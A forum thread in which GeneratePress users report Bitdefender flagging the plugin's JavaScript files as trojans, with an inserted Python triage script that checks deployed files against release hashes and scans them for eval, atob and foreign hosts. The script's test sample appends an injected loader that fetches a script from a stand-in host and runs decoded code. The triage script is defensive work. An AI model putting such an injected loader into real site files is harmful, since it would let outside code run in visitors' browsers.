[Resolved] Bitdefender blocks my GP sites as dangerous / infected – false positives

Viewing 15 posts - 1 through 15 (of 26 total)
    #1630943
    TogaD

    Hi everyone,

    My apologies in advance for the long post! However, it’s a matter of great importance.

    I’m new to GP and just bought my Premium license last month after a couple of years of using the Genesis platform. I’m extremely impressed and happy with GeneratePress so far! While I’m not a WP expert designer by any means, and I have a colleague who is very WordPress savvy who helps me with each site, GP has given me more ability to control things that I would normally have had to rely on my colleague for: a lot of custom CSS that I don’t even have to bother with when using GP Premium. Awesome 🙂

    However, I’ve run into a major issue – a widely used computer security suite (Bitdefender Total Security) that I’ve used on my workstations for years is detecting each site that I switch to GP as being “Infected” and “Dangerous” (even on fresh new clean installs of WP 5.6 with only the default Twenty Twenty-One theme enabled before installing GP).

    This is most definitely an issue of false-positives, but since I’d have to submit each site URL to Bitdefender that I create using GP and wait 72 hours to get them removed from Bitdefender’s blocking list, I thought it best to bring it to the attention of GP devs (and other GP users here, just in case anyone else encounters this, but GP devs would have the best chance of communicating with Bitdefender devs in order to squash this critical issue).

    Before I dive into Bitdefender issue details:

    What I DO know is my servers and sysadmin maintenance.

    Server environment basics – cPanel (release tier for Production servers), CloudLinux OS, PHP 7.4, MySQL 7
    WordPress environment basics – Individual installs (not multi-site) of WP 5.6 with only a few plugins (WPForms Pro, iThemes Security Pro, SeedProd Pro)
    GP basics – theme version 3.0.2 / Premium plugin version 1.12.3

    The issue of Bitdefender detecting sites as infected / dangerous only happens on sites that I use GP on. All other sites I’ve done with my colleague using all the other frameworks / builders such as Genesis, Elementor, Divi, and a wide variety of other well-known themes pass Bitdefender’s detection with no issue.

    I’ve run CXS (Configserver Exploit Scanner) scans on the sites that I’ve used GP Premium on, and they are totally clean.

    I can also clearly see that they are all 100% clean on these important sites:

    https://sitecheck.sucuri.net – all sites “green” / safe

    https://www.virustotal.com – all sites “green” / “No engines detected this URL”

    https://www.ssllabs.com/ssltest – all sites AND servers score A+

    With all that said and known, here’s what happens after I install GP (regardless of free or premium). I’ve removed the actual URLs and replaced them with (website url) for privacy reasons.

    ———————-
    MESSAGE FROM BITDEFENDER

    Dangerous page blocked for your protection
    https:// (website url)

    Dangerous pages attempt to install software that can harm the device, gather personal information or operate without your consent.
    Infected web page detected!
    Feature: Online Threat Prevention

    (And that’s just upon visiting the sites without even logging in … it gets worse when I ).

    Bitdefender blocked this dangerous page for your protection:

    https:// (website url) /wp-content/plugins/gp-premium/spacing/functions/customizer/js/customizer.js?ver=1.12.3
    Threat name: Trojan.GenericKD.45613884

    https:// (website url) /wp-content/plugins/gp-premium/typography/functions/js/customizer.js?ver=1.12.3
    Threat name: Trojan.GenericKD.45613846

    https:// (website url) /wp-content/plugins/gp-premium/colors/functions/js/customizer.js?ver=1.12.3
    Threat name: Trojan.GenericKD.45613741

    https:// (website url) /wp-content/plugins/gp-premium/colors/functions/js/menu-plus-customizer.js?ver=1.12.3
    Threat name: Trojan.GenericKD.45613906

    https:// (website url) /wp-content/plugins/gp-premium/blog/functions/js/controls.js?ver=1.12.3
    Threat name: Trojan.GenericKD.45613899

    https:// (website url) /wp-content/plugins/gp-premium/library/customizer/controls/js/selectWoo.min.js?ver=1.12.3
    Threat name: Trojan.GenericKD.45613828

    https:// (website url) /wp-content/plugins/gp-premium/library/customizer/controls/js/spacing-customizer.js?ver=1.12.3
    Threat name: Trojan.GenericKD.45613820

    https:// (website url) /wp-content/plugins/gp-premium/library/customizer/controls/js/generatepress-controls.js?ver=1.12.3
    Threat name: Trojan.GenericKD.45613893

    https:// (website url) /wp-content/plugins/gp-premium/library/customizer/controls/js/selectWoo.min.js?ver=1.12.3
    Threat name: Trojan.GenericKD.45613828
    ——————-

    And a few more… you get the idea though. Seems that BD sees basically everything GP modifies / calls as a threat.

    I’m truly hoping that the team at GP can reach out to the team at BD and sort this, because I’m REALLY digging GP and I want to get away from all the other builders and make GP one of the main tools that I use for every site.

    Thanks for your patience with this “GP noob”!

    #1630953
    Tom

    I am another GP user who is getting Bitdefender warnings on my site tonight! Here is the Bitdefender warning:

    Infected web page detected
    now

    Feature:
    Online Threat Prevention

    We blocked this dangerous page for your protection:
    https://www.distanceenergywork.com/wp-content/plugins/gp-premium/sections/functions/metaboxes/js/generate-sections-metabox.js?ver=1.12.3
    Threat name: Trojan.GenericKD.45613695
    Dangerous pages attempt to install software that can harm the device, gather personal information or operate without your consent.

    #1630957
    TogaD

    Hi Tom, sorry to hear you’re going through the same thing but also semi-relieved to know it’s not just me.

    I have a feeling it might be to do with a Bitdefender update within the past 24 hours, because I’ve had these files on my computer for weeks and look what a full Bitdefender Total Security scan just deleted from within the gp-premium-1.12.3.zip file on my local Windows 10 Pro PC hard drive!

    Scan Results Summary

    Resolved issues

    All items below are inside C:\Users\(path)\Wordpress Plugins\GENERATEPRESS\gp-premium-1.12.3.zip; the paths are the archive members as reported by Bitdefender.

    Item path | Threat name | Action taken
    gp-premium/colors/functions/js/wc-customizer.js | Trojan.GenericKD.45613745 | Deleted
    gp-premium/colors/functions/js/customizer.js | Trojan.GenericKD.45613741 | Deleted
    gp-premium/blog/functions/js/controls.js | Trojan.GenericKD.45613899 | Deleted
    gp-premium/blog/functions/js/customizer.js | Trojan.GenericKD.45613873 | Deleted
    gp-premium/typography/functions/js/customizer.js | Trojan.GenericKD.45613846 | Deleted
    gp-premium/general/js/smooth-scroll.js | Trojan.GenericKD.45613826 | Deleted
    gp-premium/blog/functions/js/scripts.js | Trojan.GenericKD.45613703 | Deleted
    gp-premium/colors/functions/js/menu-plus-customizer.js | Trojan.GenericKD.45613906 | Deleted
    gp-premium/elements/assets/admin/metabox.js | Trojan.GenericKD.45613827 | Deleted
    gp-premium/library/alpha-color-picker/wp-color-picker-alpha.js | Trojan.GenericKD.45613729 | Deleted
    gp-premium/library/alpha-color-picker/wp-color-picker-alpha.min.js | Trojan.GenericKD.45613836 | Deleted
    gp-premium/library/customizer/controls/js/typography-customizer.js | Trojan.GenericKD.45613754 | Deleted
    gp-premium/library/customizer/controls/js/generatepress-controls.js | Trojan.GenericKD.45613893 | Deleted
    gp-premium/library/customizer/controls/js/selectWoo.min.js | Trojan.GenericKD.45613828 | Deleted
    gp-premium/page-header/functions/js/jquery.vide.min.js | Trojan.GenericKD.45613818 | Deleted
    gp-premium/library/customizer/controls/js/spacing-customizer.js | Trojan.GenericKD.45613820 | Deleted
    gp-premium/menu-plus/functions/js/offside.js | Trojan.GenericKD.45613726 | Deleted
    gp-premium/menu-plus/functions/js/sticky.js | Trojan.GenericKD.45613806 | Deleted
    gp-premium/page-header/functions/js/metabox.js | Trojan.GenericKD.45613716 | Deleted
    gp-premium/secondary-nav/functions/js/customizer.js | Trojan.GenericKD.45613755 | Deleted
    gp-premium/sections/functions/metaboxes/js/generate-sections-metabox-4.9.js | Trojan.GenericKD.45613735 | Deleted
    gp-premium/sections/functions/metaboxes/js/generate-sections-metabox.js | Trojan.GenericKD.45613695 | Deleted
    gp-premium/sites/assets/js/admin.js | Trojan.GenericKD.45613760 | Deleted
    gp-premium/sites/assets/js/download.js | Trojan.GenericKD.45613713 | Deleted
    gp-premium/spacing/functions/customizer/js/customizer.js | Trojan.GenericKD.45613884 | Deleted
    gp-premium/woocommerce/functions/js/woocommerce.js | Trojan.GenericKD.45613710 | Deleted

    The only thing I can find in common for the moment is that it is only detecting the .js files as infected.

    This is clearly something that can only be sorted out between BD and GP devs.

    #1630960
    Tom

    I’ll run the Bitdefender full scan now also. Thanks for that idea. Yes, it seems this must have been caused by something that GP did today. I was editing our website yesterday and all was well, but now, threat detections every time I try to edit any page on our website.

    #1630963
    TogaD

    PS Tom – in order to help get this issue resolved, as “end-users” we’re going to need to hound Bitdefender Support as much as possible in order for them to take any serious look into it on their end. If we team up and start submitting support tickets about this to BD then they’ll start to look into it. If only one BD user reports this, it will get ignored. I’m opening a second ticket with them right now and providing more details. I hope you (and anyone else who encounters this) will do so as well. It’s the only way to get results with such large software companies. 🙁

    #1630967
    TogaD

    PPS Tom – you know, you might be right about a change with GP. Perhaps the paths being called in the .js files appear to be associated with a site/server that has either been compromised or appears to be. I’m going to dig into the files on the server manually to see what I can spot, since trying to put the files back on my computer just ends up in Bitdefender deleting them as a detected Trojan.

    Thankfully we’re in this together. But so much for any sleep this weekend.. ugh…

    #1630984
    TogaD

    While I’m no coder, sifting through the GP plugin files on the server and viewing the code, so far I’m not seeing anything that should be construed as malicious or harmful. I haven’t discovered any direct paths / calls to “bad” servers, have not yet found any base64 obfuscation that would trigger anything, and the fact that my Exploit Scanner software on my servers sees all the code as clean is another indicator to me that this is not likely a problem with GP’s code and more likely with Bitdefender’s detection rules. (Especially when considering all of the research I’ve documented in previous posts above).

    Crossing my fingers that someone from GP will notice this soon and assist in how we should approach BD. I was supposed to be launching an e-commerce site for a customer this weekend and this has stopped the project dead in the water.

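    As an added example (not code from this thread, from GeneratePress or from Bitdefender), here is the manual triage TogaD describes above turned into a repeatable offline check: hash the .js members of a freshly downloaded release zip, compare those hashes against the files the server actually serves, and grep the served files for the indicators a reviewer looks for by hand (eval/atob, long encoded blobs, script loads from hosts the plugin has no business contacting). A file whose hash matches the vendor release cannot have been tampered with on the server, which is the strongest argument to put in a false-positive report. The customizer snippet, the tampered copy, the host cdn.example.invalid and the `demo-plugin/…` zip layout are all constructed for the demo and are not GP Premium's.

```python
import hashlib
import io
import re
import zipfile

# Indicators a reviewer checks by hand when deciding whether a flagged JS file
# was tampered with: dynamic code execution, decoding of embedded payloads,
# long encoded blobs. URLs are handled separately so known-good hosts can be allowed.
INDICATORS = {
    "eval": re.compile(r"\beval\s*\("),
    "function_ctor": re.compile(r"\bFunction\s*\("),
    "atob": re.compile(r"\batob\s*\("),
    "unescape": re.compile(r"\bunescape\s*\("),
    "hex_escape_run": re.compile(r"(?:\\x[0-9a-fA-F]{2}){8,}"),
    "base64_blob": re.compile(r"[A-Za-z0-9+/]{100,}={0,2}"),
}
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def hash_zip_members(zip_path_or_file, suffix=".js") -> dict:
    """Hash every member ending in `suffix` inside a release zip.
    Run this on a freshly downloaded vendor zip to build the reference set."""
    with zipfile.ZipFile(zip_path_or_file) as zf:
        return {
            info.filename: sha256_hex(zf.read(info))
            for info in zf.infolist()
            if not info.is_dir() and info.filename.endswith(suffix)
        }


def scan_source(source: str, allowed_hosts=()) -> dict:
    """Return indicator name -> list of matches; empty dict means nothing found.
    Hosts in allowed_hosts (your own site, a CDN the plugin legitimately uses) are ignored."""
    hits = {name: rx.findall(source) for name, rx in INDICATORS.items()}
    hits = {name: found for name, found in hits.items() if found}
    foreign = sorted({h for h in URL_RE.findall(source) if h not in allowed_hosts})
    if foreign:
        hits["external_host"] = foreign
    return hits


def triage(deployed: dict, reference: dict, allowed_hosts=()) -> dict:
    """deployed: member path -> bytes as read from the live server or local disk.
    reference: member path -> sha256 from hash_zip_members() on the pristine release.
    Verdicts: clean (hash matches, no indicators), review (hash matches but the
    vendor code itself uses an indicator), modified, unexpected (not in release), missing."""
    report = {}
    for path, data in deployed.items():
        if path not in reference:
            verdict = "unexpected"
        elif sha256_hex(data) == reference[path]:
            verdict = "clean"
        else:
            verdict = "modified"
        hits = scan_source(data.decode("utf-8", "replace"), allowed_hosts)
        if verdict == "clean" and hits:
            verdict = "review"
        report[path] = {"verdict": verdict, "indicators": hits}
    for path in reference.keys() - deployed.keys():
        report[path] = {"verdict": "missing", "indicators": {}}
    return report


# Constructed sample: a stripped-down customizer script in the style of the flagged
# files (jQuery + wp.customize), plus a copy with an injected loader appended.
PRISTINE_JS = b"""( function( $ ) {
    'use strict';
    wp.customize( 'generate_settings[container_width]', function( value ) {
        value.bind( function( newval ) {
            $( '.inside-header' ).css( 'max-width', newval + 'px' );
        } );
    } );
} )( jQuery );
"""
TAMPERED_JS = PRISTINE_JS + b"""
;(function(){var s=document.createElement('script');
s.src='https://cdn.example.invalid/l.js';document.head.appendChild(s);
eval(atob('YWxlcnQoMSk='));})();
"""


def make_demo_zip() -> io.BytesIO:
    """In-memory stand-in for the vendor release zip (hypothetical layout)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("demo-plugin/js/customizer.js", PRISTINE_JS)
        zf.writestr("demo-plugin/readme.txt", "not scanned")
    buf.seek(0)
    return buf


def demo() -> dict:
    reference = hash_zip_members(make_demo_zip())
    deployed = {
        "demo-plugin/js/customizer.js": TAMPERED_JS,          # what the server serves
        "demo-plugin/js/dropped.js": b"document.write('x');",  # not in the release at all
    }
    return triage(deployed, reference)


if __name__ == "__main__":
    for path, result in demo().items():
        print(path, result["verdict"], sorted(result["indicators"]))
```

    In practice you would point hash_zip_members at the downloaded gp-premium zip, read the deployed files over SSH or from a backup, and attach the matching-hash list to the vendor report; a "modified" or "unexpected" verdict is the point at which the false-positive assumption should stop and a real incident review should start.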
    #1631118
    Marlon Faust

    I’ve got the same problem since today on all websites:

    /wp-content/plugins/gp-premium/colors/functions/js/menu-plus-customizer.js

    Trojan.GenericKD.45613906

    #1631609
    Tom
    Lead Developer

    Very strange indeed. These are all just regular JavaScript files using jQuery that haven’t changed in the theme at all recently (some haven’t for a few years).

    If you take these files and run them through any sort of virus software (Bitdefender excluded), they all pass just fine, as there’s nothing malicious in them whatsoever.

    This does seem to be something specific to Bitdefender – we’ll reach out today as well.

    The more people that report this to them, the faster they should want to resolve it.

    As I mentioned above, these are just standard JavaScript files using jQuery – there isn’t anything we can do on our end to “fix” the issue. It’s most certainly a false-positive on their end.

    Thanks!

    #1631650
    Tom

    Hi Tom, I have started a chat with Bitdefender support right now, explaining what is happening on our website.

    #1631652
    Tom
    Lead Developer

    Awesome, thank you! I also reached out via email.

    #1631792
    Tom

    The Bitdefender employee in the chat could not help me directly. He just referred me to this Bitdefender False Positive Form page: https://www.bitdefender.com/consumer/support/answer/40673/

    I filled it out twice for two suspect URLs, and suggest that everyone who is having problems with this issue fill out this form as many times as they wish.

    #1631841
    Tom
    Lead Developer

    I’ll report there as well. Their Twitter seems to direct people to bitsy@bitdefender.com for issues as well.

    As a test, I ran a handful of the files mentioned above through the following tool – all good: https://opentip.kaspersky.com/

    #1631921
    TogaD

    Bitdefender even blocked my access to https://generatepress.com until I added it as an exception (for now) in my Bitdefender Total Security settings.

    As user (not dev) Tom mentioned above, we should all submit these false-positives to BD at this link – https://www.bitdefender.com/consumer/support/answer/40673/

    And that’s not just for URLs – you can also upload the files (like you can on virustotal.com), so I’m uploading the .js files from the GP Premium plugin at https://www.bitdefender.com/consumer/support/answer/40673/ as well.

    If we continue to join together and knock on their door about this, they will resolve it. I’ve been using BD for many years, and have reported false-positives before, and they usually resolve them in about 3 business days. But that’s just when one person alone submits a report. I imagine that if they get reports from multiple people for the same sites / same files, they’ll likely move faster to resolve the issue on their end.

    Yes it’s time-consuming to submit the reports, but BD is widely used (especially by my clientele) so it is very important that we all take action in order to clear GP from BD’s blocking / malware database.

    #1631924
    Tom
    Lead Developer

    I’ve sent them a couple of different emails to different areas, so hopefully they’ll get back to us by tomorrow. Definitely frustrating that something like this can happen – I’m assuming it should be an easy fix on their end.

    Thanks again for reporting it to them as well – really appreciate it 🙂
